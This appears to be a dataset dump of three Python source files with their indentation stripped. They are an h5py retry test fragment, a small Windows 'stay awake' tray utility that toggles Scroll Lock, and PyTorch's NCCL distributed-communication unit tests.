def test_retry_custom(self):
filename = self._new_filename()
ncausefailure = 3
faildelay = 0.1
sufficient_timeout = ncausefailure * (faildelay + 10)
insufficient_timeout = ncausefailure * faildelay * 0.5
@h5py_utils.retry_contextmanager()
def open_item(filename, name):
nonlocal failcounter
if failcounter < ncausefailure:
time.sleep(faildelay)
failcounter += 1
raise RetryError
with h5py_utils.File(filename) as h5file:
yield h5file[name]
failcounter = 0
kw = {"retry_timeout": sufficient_timeout}
with open_item(filename, "/check", **kw) as item:
self.assertTrue(item[()])
failcounter = 0
kw = {"retry_timeout": insufficient_timeout}
with self.assertRaises(RetryTimeoutError):
with open_item(filename, "/check", **kw) as item:
pass
@subtests
def test_retry_in_subprocess(self):
filename = self._new_filename()
txtfilename = os.path.join(self.test_dir, "failcounter.txt")
ncausefailure = 3
faildelay = 0.1
sufficient_timeout = ncausefailure * (faildelay + 10)
insufficient_timeout = ncausefailure * faildelay * 0.5
kw = {
"retry_timeout": sufficient_timeout,
"include_only": None,
"ncausefailure": ncausefailure,
"faildelay": faildelay,
}
with open(txtfilename, mode="w") as f:
f.write("0")
names = top_level_names_test(txtfilename, filename, **kw)
self.assertEqual(names, ["check"])
kw = {
"retry_timeout": insufficient_timeout,
"include_only": None,
"ncausefailure": ncausefailure,
"faildelay": faildelay,
}
with open(txtfilename, mode="w") as f:
f.write("0")
with self.assertRaises(RetryTimeoutError):
top_level_names_test(txtfilename, filename, **kw)
|
awake.pyw | """awake: a small utility to keep a windows machine from going asleep"""
import threading
import time
import logging
from pyautogui import press
from pystray import MenuItem as item
import pystray
from PIL import Image
import tkinter as tk
#Enabled/Disable Debug Mode
DEBUGMODE = False
if DEBUGMODE:
logging.basicConfig(format='%(message)s', level=logging.DEBUG)
logging.debug("DEBUG MODE ACTIVE")
def second_thread():
"""handles launching of a second thread"""
logging.debug("2nd Thread Start")
while getattr(threading.currentThread(), "do_run", True):
for _ in range(0, 2): #always do it twice, so scrollock returns to original state
press('scrolllock')
time.sleep(0.4) ##400ms
logging.debug("2nd Thread Stop")
def main():
"""main gui thread"""
#Create the Window
window = tk.Tk()
window.wm_attributes("-topmost", 1) #always on top
window.resizable(0, 0) #no maximise button
window.title("Stay Awake, Don't Sleep!")
window.iconbitmap("./icon/ZZZZ.ico")
window.geometry("512x256")
#Add an Image
img = tk.PhotoImage(file="image/ZZZZ.png")
img_label = tk.Label(window, image=img)
img_label.pack()
#Launch Second (Scroll Lock Button Pressing) Thread
thread = threading.Thread(target=second_thread)
thread.start()
#Functions used for tray icon code
def quit_window(icon, item):
icon.stop()
window.destroy()
def show_window(icon, item):
icon.stop()
window.after(0,window.deiconify)
def withdraw_window():
window.withdraw()
image = Image.open("./icon/Z.ico")
menu = (item('Show', show_window), item('Quit', quit_window))
icon = pystray.Icon("name", image, "Stay Awake, Don't Sleep!", menu)
icon.run()
#Close to Tray
window.protocol("WM_DELETE_WINDOW", withdraw_window)
#Start in Tray
withdraw_window()
#Main tkinter window loop
window.mainloop()
#Kill Second Thread
thread.do_run = False
thread.join()
if __name__ == "__main__":
main()
|
test_c10d_nccl.py | # Owner(s): ["oncall: distributed"]
import copy
import math
import os
import random
import signal
import sys
import tempfile
import threading
import time
from contextlib import contextmanager
from datetime import timedelta
from itertools import product
from unittest import mock
import torch
import torch.distributed as c10d
if not c10d.is_available():
print("c10d not available, skipping tests", file=sys.stderr)
sys.exit(0)
import test_c10d_common
import torch.distributed as dist
import torch.distributed.algorithms.ddp_comm_hooks.default_hooks as default
import torch.distributed.algorithms.ddp_comm_hooks.powerSGD_hook as powerSGD
import torch.nn.functional as F
import torch.testing._internal.common_utils as common
from test_c10d_common import gpus_for_rank, DoubleGpuNet, ConvNet, ModuleForDdpCommHook
from torch import nn
from torch.nn.parallel import DistributedDataParallel
from torch.testing._internal.common_distributed import (
MultiProcessTestCase,
requires_nccl,
requires_nccl_version,
skip_if_lt_x_gpu,
get_timeout,
skip_if_rocm,
with_dist_debug_levels,
with_nccl_blocking_wait,
)
from torch.testing._internal.common_utils import (
TestCase,
run_tests,
retry_on_connect_failures,
TEST_WITH_DEV_DBG_ASAN,
TEST_WITH_ROCM,
sandcastle_skip,
sandcastle_skip_if,
)
from torch.utils.checkpoint import checkpoint
from torch.distributed.optim import functional_optim_map
from torch.distributed.optim.functional_sgd import _FunctionalSGD
from torch.distributed.optim.functional_adam import _FunctionalAdam
from torch.distributed.optim.functional_adamw import _FunctionalAdamW
if TEST_WITH_DEV_DBG_ASAN:
print(
"Skip ASAN as torch + multiprocessing spawn have known issues", file=sys.stderr
)
sys.exit(0)
# bfloat16 is only supported by CUDA 11+
BFLOAT16_AVAILABLE = (
torch.cuda.is_available()
and torch.version.cuda is not None
and int(torch.version.cuda.split('.')[0]) >= 11)
class RendezvousEnvTest(TestCase):
@retry_on_connect_failures
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_common_errors(self):
vars = {
"WORLD_SIZE": "1",
"RANK": "0",
"MASTER_ADDR": "127.0.0.1",
"MASTER_PORT": str(common.find_free_port()),
}
class Env(object):
def __init__(self, vars):
self.env_patcher = mock.patch.dict(os.environ, vars, clear=True)
def __enter__(self):
self.env_patcher.start()
def __exit__(self, type, value, traceback):
self.env_patcher.stop()
def without(d, key):
d = d.copy()
d.pop(key)
return d
def withouts(d, keys):
d = d.copy()
for key in keys:
d.pop(key)
return d
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
with self.assertRaisesRegex(ValueError, "WORLD_SIZE expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
with self.assertRaisesRegex(ValueError, "RANK expected"):
gen = c10d.rendezvous("env://")
next(gen)
c10d.init_process_group(backend="nccl", rank=0)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
c10d.init_process_group(backend="nccl", rank=0, world_size=1)
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(vars):
c10d.init_process_group(backend="nccl")
self.assertEqual(c10d.get_rank(), 0)
self.assertEqual(c10d.get_world_size(), 1)
c10d.destroy_process_group()
with Env(without(vars, "MASTER_ADDR")):
self.assertEqual(None, os.environ.get("MASTER_ADDR"))
with self.assertRaisesRegex(ValueError, "MASTER_ADDR expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "MASTER_PORT")):
self.assertEqual(None, os.environ.get("MASTER_PORT"))
with self.assertRaisesRegex(ValueError, "MASTER_PORT expected"):
gen = c10d.rendezvous("env://")
next(gen)
with Env(without(vars, "WORLD_SIZE")):
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?world_size={}".format(1))
_, _, size = next(gen)
self.assertEqual(size, 1)
with Env(without(vars, "RANK")):
self.assertEqual(None, os.environ.get("RANK"))
gen = c10d.rendezvous("env://?rank={}".format(0))
_, rank, _ = next(gen)
self.assertEqual(rank, 0)
with Env(withouts(vars, ["RANK", "WORLD_SIZE"])):
self.assertEqual(None, os.environ.get("RANK"))
self.assertEqual(None, os.environ.get("WORLD_SIZE"))
gen = c10d.rendezvous("env://?rank={}&world_size={}".format(0, 1))
_, rank, size = next(gen)
self.assertEqual(rank, 0)
self.assertEqual(size, 1)
class TimeoutTest(test_c10d_common.AbstractTimeoutTest, TestCase):
@requires_nccl()
@retry_on_connect_failures
@sandcastle_skip_if(
torch.cuda.device_count() == 0, "No GPUs available, skipping test"
)
def test_default_store_timeout_nccl(self):
self._test_default_store_timeout("nccl")
class ProcessGroupNCCLNoGPUTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(
torch.cuda.device_count() > 0, "GPUs are available, skipping test"
)
def test_init_no_gpus(self):
store = c10d.FileStore(self.file.name, self.world_size)
with self.assertRaisesRegex(
RuntimeError, "ProcessGroupNCCL is only supported with GPUs, no GPUs found!"
):
c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ProcessGroupNCCLTest(TestCase):
MAIN_PROCESS_RANK = 0
def setUp(self):
self.rank = self.MAIN_PROCESS_RANK
self.world_size = 1
self.file = tempfile.NamedTemporaryFile(delete=False)
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self.num_gpus = torch.cuda.device_count()
def tearDown(self):
pass
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_empty_tensors(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
xs = [torch.cuda.FloatTensor([])]
pg.broadcast(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.allreduce(xs).wait()
self.assertEqual(0, xs[0].numel())
pg.reduce(xs).wait()
self.assertEqual(0, xs[0].numel())
ys = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.allgather(ys, xs).wait()
for y in ys[0]:
self.assertEqual(0, y.numel())
ys = [torch.cuda.FloatTensor([])]
xs = [[torch.cuda.FloatTensor([]) for _ in range(self.world_size)]]
pg.reduce_scatter(ys, xs).wait()
self.assertEqual(0, ys[0].numel())
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_broadcast_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def broadcast(xs, rootRank, rootTensor):
opts = c10d.BroadcastOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
work = pg.broadcast(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
broadcast(tensors, self.rank, rt)
for i in range(self.num_gpus):
self.assertEqual(tensors[i], tensors[rt])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allreduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors, op):
opts = c10d.AllreduceOptions()
opts.reduceOp = op
work = pg.allreduce(tensors, opts)
work.wait()
# Sum
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[i],
)
# Avg (only available for NCCL 2.10+)
if torch.cuda.nccl.version() >= (2, 10, 0):
tensors = [torch.tensor([i + 1.]).cuda(i) for i in range(self.num_gpus)]
allreduce(tensors, c10d.ReduceOp.AVG)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
ndev = float(self.num_gpus)
self.assertEqualIgnoreType(
torch.tensor([ndev * (ndev + 1.) / (2. * ndev)]),
tensors[i],
)
# Product
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(math.factorial(self.num_gpus))]), tensors[i]
)
# Min
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(torch.tensor([1.0]), tensors[i])
# Max
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
allreduce(tensors, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
self.assertEqual(torch.tensor([self.num_gpus]), tensors[i])
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
allreduce(tensors, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce(xs, rootRank, rootTensor, op=None):
opts = c10d.ReduceOptions()
opts.rootRank = rootRank
opts.rootTensor = rootTensor
if op:
opts.reduceOp = op
work = pg.reduce(xs, opts)
work.wait()
# for every root tensor
for rt in range(self.num_gpus):
tensors = []
for i in range(self.num_gpus):
tensors.append(torch.tensor([i + 1]).cuda(i))
reduce(tensors, self.rank, rt)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(self.num_gpus * (self.num_gpus + 1) / 2)]),
tensors[rt],
)
for op in (c10d.ReduceOp.BAND, c10d.ReduceOp.BOR, c10d.ReduceOp.BXOR):
with self.assertRaisesRegex(
RuntimeError, "Cannot use " + str(op) + " with NCCL"
):
reduce(tensors, self.rank, rt, op)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather(output_ts, input_ts):
work = pg.allgather(output_ts, input_ts)
work.wait()
tensors = []
output_ts = [[] for _ in range(self.num_gpus)]
for idx, ls in enumerate(output_ts):
for _ in range(self.world_size * self.num_gpus):
ls.append(torch.tensor([0]).cuda(idx))
for i in range(self.num_gpus):
tensors.append(torch.tensor([i]).cuda(i))
allgather(output_ts, tensors)
# Verification
for device_ts in output_ts:
for s_idx, t in enumerate(device_ts):
self.assertEqual(torch.tensor([s_idx]), t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# allgather_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size), dtype=tensor.dtype).cuda(device_id)
allgather_base(output_t, tensor)
# Verification
self.assertEqual(torch.arange(self.world_size), output_t)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_allgather_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allgather_base(output_t, input_t):
work = pg._allgather_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"output tensor size must be equal to world_size times input tensor size",
):
tensor = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=tensor.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
allgather_base(output_t, tensor)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "output tensor must have the same type as input tensor"
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
allgather_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_basics(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# anticpate an error
with self.assertRaisesRegex(
RuntimeError,
"input tensor must be the same size as output size times world size",
):
input_t = torch.tensor([self.rank]).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=input_t.dtype).cuda(
device_id
)
# fails the check because output_t is not correctly sized
reduce_scatter_base(output_t, input_t)
# anticpate an error
with self.assertRaisesRegex(
RuntimeError, "input tensor must be the same type as the outut tensor."
):
tensor = torch.tensor([self.rank], dtype=torch.float).cuda(device_id)
output_t = torch.empty((self.world_size + 1), dtype=torch.long).cuda(
device_id
)
# fails the check because the dtype is different
reduce_scatter_base(output_t, tensor)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter(outputs, input_lists, op):
opts = c10d.ReduceScatterOptions()
opts.reduceOp = op
work = pg.reduce_scatter(outputs, input_lists, opts)
work.wait()
virtual_rank = self.rank * self.world_size
virtual_world_size = self.num_gpus * self.world_size
output = [torch.tensor([0]).cuda(i) for i in range(self.num_gpus)]
# 0 1 2
# 0 [0..11] [1..12]
# 1 [3..14]
# 2
# 3
# Sum
tensor_lists = [
[
torch.tensor([self.rank * self.num_gpus + i + j]).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.SUM)
for i in range(self.num_gpus):
expected = torch.tensor(
[
float(self.num_gpus * (self.num_gpus - 1) / 2)
+ (virtual_rank + i) * virtual_world_size
]
)
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
# Min
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MIN)
for i in range(self.num_gpus):
expected = torch.tensor([self.rank * self.world_size + i])
self.assertEqual(expected, output[i])
# Max
reduce_scatter(output, tensor_lists, c10d.ReduceOp.MAX)
for i in range(self.num_gpus):
expected = torch.tensor(
[self.rank * self.world_size + i + virtual_world_size - 1]
)
self.assertEqual(expected, output[i])
# Product
tensor_lists = [
[
torch.tensor(
[(self.rank * self.num_gpus + i + j) % virtual_world_size + 1]
).cuda(i)
for j in range(virtual_world_size)
]
for i in range(self.num_gpus)
]
reduce_scatter(output, tensor_lists, c10d.ReduceOp.PRODUCT)
for i in range(self.num_gpus):
expected = torch.tensor([float(math.factorial(virtual_world_size))])
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(expected, output[i])
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_reduce_scatter_base_ops(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def reduce_scatter_base(output_t, input_t):
work = pg._reduce_scatter_base(output_t, input_t)
work.wait()
device_id = self.rank % self.num_gpus
# reduce_scatter_base is GPU number agnostic.
# Each rank contribute one tensor regardless of GPU counts
output_t = torch.empty([1]).cuda(device_id)
tensor = torch.arange(self.world_size, dtype=output_t.dtype).cuda(device_id)
reduce_scatter_base(output_t, tensor)
# Verification
self.assertEqual(output_t[0], self.rank * self.world_size)
@requires_nccl()
@sandcastle_skip_if(torch.cuda.device_count() < 2, "NCCL test requires 2+ GPUs")
def test_barrier(self):
store = c10d.FileStore(self.file.name, self.world_size)
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
def allreduce(tensors):
opts = c10d.AllreduceOptions()
work = pg.allreduce(tensors, opts)
return work
# Making the collective to operate on
# 1, 2, 3, 4, .... self.num_gpus GPUs
tensors_list = [[] for _ in range(2, self.num_gpus + 1)]
for i in range(2, self.num_gpus + 1):
for j in range(i):
tensors_list[i - 2].append(torch.tensor([j + 1]).cuda(j))
works = []
for tensors in tensors_list:
work = allreduce(tensors)
works.append(work)
# Barrier will ensure that all previous work is completed
pg.barrier().wait()
for i in range(2, self.num_gpus + 1):
for j in range(i):
# TODO(#38095): Replace assertEqualIgnoreType. See issue #38095
self.assertEqualIgnoreType(
torch.tensor([float(i * (i + 1) / 2)]), tensors_list[i - 2][j]
)
class DistributedDataParallelTest(
test_c10d_common.AbstractDistributedDataParallelTest, MultiProcessTestCase
):
def setUp(self):
super(DistributedDataParallelTest, self).setUp()
# NCCL_BLOCKING_WAIT overrides NCCL_ASYNC_ERROR_HANDLING hence tests
# that use NCCL_BLOCKING_WAIT will test it as expected.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "1"
self._spawn_processes()
def _test_nccl_backend(
self, devices, device_ids, multi_device=False, gradient_as_bucket_view=False
):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
self._test_ddp_with_process_group(
process_group, devices, device_ids, multi_device, gradient_as_bucket_view
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_propagate_error_reason(self):
# Need to use NCCL_BLOCKING_WAIT and not ASYNC_ERROR_HANDLING,
# otherwise process will be taken down and we can't check for errors.
os.environ["NCCL_ASYNC_ERROR_HANDLING"] = "0"
os.environ["NCCL_BLOCKING_WAIT"] = "1"
# TODO: smaller timeout can fail since PG NCCl does health check in
# constructor. Look into reducing this test's runtime.
store = c10d.FileStore(self.file_name, self.world_size)
# provide sufficient timeout to initialize NCCL comm.
pg = c10d.ProcessGroupNCCL(store, self.rank, self.world_size, timeout=timedelta(seconds=15))
pg_gloo = c10d.ProcessGroupGloo(store, self.rank, self.world_size)
pg.barrier().wait(timedelta(seconds=5))
# Simulate stuckness in rank 0.
if self.rank == 0:
pg_gloo.barrier().wait()
inp = torch.ones(1).cuda(self.rank)
if self.rank != 0:
# Time out due to rank 0 not calling into allreduce.
with self.assertRaises(RuntimeError):
pg.allreduce([inp]).wait(timedelta(seconds=5))
# Now when nonzero rank attempts to use communicator, original failure reason should be logged.j
try:
pg.allreduce([torch.ones(2).cuda(self.rank)]).wait()
except RuntimeError as e:
self.assertTrue("timed out in call to wait()" in str(e))
self.assertTrue("TensorShape=[1]" in str(e))
else:
self.fail("Expected error to be raised!")
# Unblock rank 0
pg_gloo.barrier().wait()
# TODO: We can also test that if rank 0 attempts to use the communicator,
# then we should error out with the info that it was aborted due to
# timeout on another rank. Although this would only be the case after
# the watchdog has run on the rank, and there is no reliable way
# to confirm it has run.
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_multi_device_ids_not_allowed(self):
int_devices = list(range(torch.cuda.device_count()))
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_device_ids_None(self):
self._test_nccl_backend(None, None)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_single_device_module_empty_device_ids(self):
# This tests the backward compatibility of accepting an empty list as `device_ids`,
# although we no longer document this in favor of the default value of `None`,
# which is consistent with multi-device modules and CPU modules.
self._test_nccl_backend(None, [])
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_multi_device_module_device_ids_None(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_integer_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, int_devices)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_nccl_backend_1gpu_module_device_ids_torch_device_list(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:1]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, devices)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_nccl_backend_2gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:2]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(8)
def test_nccl_backend_4gpu_module(self):
int_devices = gpus_for_rank(self.world_size)[self.rank][:4]
devices = [torch.device("cuda:" + str(i)) for i in int_devices]
self._test_nccl_backend(devices, None, multi_device=True)
@requires_nccl()
@skip_if_lt_x_gpu(4)
def test_ddp_multi_device_module_config(self):
gpus = gpus_for_rank(self.world_size)[self.rank]
self.assertTrue(len(gpus) >= 2, "expecting at least 2 gpus per process")
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus[:2]
model = DoubleGpuNet(gpus)
with self.assertRaisesRegex(
ValueError,
"DistributedDataParallel device_ids and output_device arguments only work with "
"single-device/multiple-device GPU modules or CPU modules",
):
ddp_model = DistributedDataParallel(
model, output_device=gpus[1], process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
with self.assertRaisesRegex(
ValueError, "input module must be on the same type of devices"
):
model.fc1 = model.fc1.cpu()
ddp_model = DistributedDataParallel(model, process_group=process_group)
model = model.cpu()
with self.assertRaisesRegex(
ValueError, "device_ids can only be None or contain a single element."
):
ddp_model = DistributedDataParallel(
model, device_ids=gpus, process_group=process_group
)
def _test_fp16(self, gradient_as_bucket_view=False):
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
gpus = gpus_for_rank(self.world_size)[self.rank]
model = nn.Linear(1, 1, bias=False).cuda(gpus[0]).half()
nn.init.constant_(model.weight, 1)
ddp_model = DistributedDataParallel(
model,
device_ids=[gpus[0]],
process_group=process_group,
bucket_cap_mb=0.001,
gradient_as_bucket_view=gradient_as_bucket_view,
)
# Input 2**15, so that the gradients will overflow with a
# world_size of 2, unless we normalize the gradient by the
# world_size before the reduction
input = torch.tensor([[2 ** 15]]).cuda(gpus[0]).half()
# Step model
ddp_model.train()
output = ddp_model(input)
loss = output.sum()
loss.backward()
self.assertFalse(any(torch.isinf(p.grad).any() for p in ddp_model.parameters()))
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16(self):
self._test_fp16()
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_fp16_grad_is_view(self):
self._test_fp16(gradient_as_bucket_view=True)
def _test_arbitrary_forward_return_value(self, gradient_as_bucket_view=False):
"""
Note: this test can be sped up by only running it on a CPU module
once DistributedDataParallel supports them.
"""
store = c10d.FileStore(self.file_name, self.world_size)
process_group = c10d.ProcessGroupNCCL(store, self.rank, self.world_size)
class ForwardReturnValueModule(nn.Module):
def __init__(self):
super(ForwardReturnValueModule, self).__init__()
self.fc1 = nn.Linear(2, 10, bias=False)
self.fc2 = nn.Linear(10, 4, bias=False)
self.fc3 = nn.Linear(4, 4, bias=False)
self.relu = nn.ReLU()
def forward(self, x, fn):
x = self.relu(self.fc1(x))
x = self.relu(self.fc2(x))
# The first softmax does NOT include fc3 in its autograd graph
# whereas the second softmax DOES. If we pass only the first
# tensor we see in the output to the reducer, it marks the
# gradient for fc3 as ready (because it doesn't show up). If
# downstream uses of this return value choose to differentiate
# against the second output tensor, it would still receive a
# gradient and a callback for this tensor, resulting in a crash.
return fn(
F.softmax(x, dim=1),
F.softmax(self.fc3(x), dim=1),
)
device_id = gpus_for_rank(self.world_size)[self.rank][0]
model = DistributedDataParallel(
ForwardReturnValueModule().float().to(device_id),
device_ids=[device_id],
process_group=process_group,
gradient_as_bucket_view=gradient_as_bucket_view,
)
batch_size = 4
criterion = nn.CrossEntropyLoss()
input = torch.rand([batch_size, 2], dtype=torch.float)
target = torch.LongTensor([random.randrange(4) for _ in range(batch_size)]).to(
device_id
)
# Always run "backward" to ensure the reducer is called by autograd.
# If we don't correctly capture the output tensors from the return value,
# the reducer won't see a hook for the unused parameter, and throw an error.
# The correct capture is what we're testing in this function.
def test(box, unbox):
output = model(input, fn=box)
loss = criterion(unbox(output), target)
loss.backward()
# Test with identity return value
test(
box=lambda x, y: (x, y),
unbox=lambda obj: obj[1],
)
# Test with list return value
test(
box=lambda x, y: ["foo", x, "bar", y],
unbox=lambda obj: obj[3],
)
# Test with tuple return value
test(
box=lambda x, y: ("foo", x, "bar", y),
unbox=lambda obj: obj[3],
)
# Test with dict return value
test(
box=lambda x, y: {"foo": "bar", "a": x, "b": y},
unbox=lambda obj: obj["b"],
)
# Test with list with dict return value
test(
box=lambda x, y: ["foo", "bar", {"a": x, "b": y}],
unbox=lambda obj: obj[2]["b"],
)
# Test with dict with list return value
test(
box=lambda x, y: {"foo": "bar", "list": [0, x, 1, y]},
unbox=lambda obj: obj["list"][3],
)
@requires_nccl()
@skip_if_lt_x_gpu(2)
def test_arbitrary_forward_return_value(self):
self._test_arbitrary_forward_return_value()
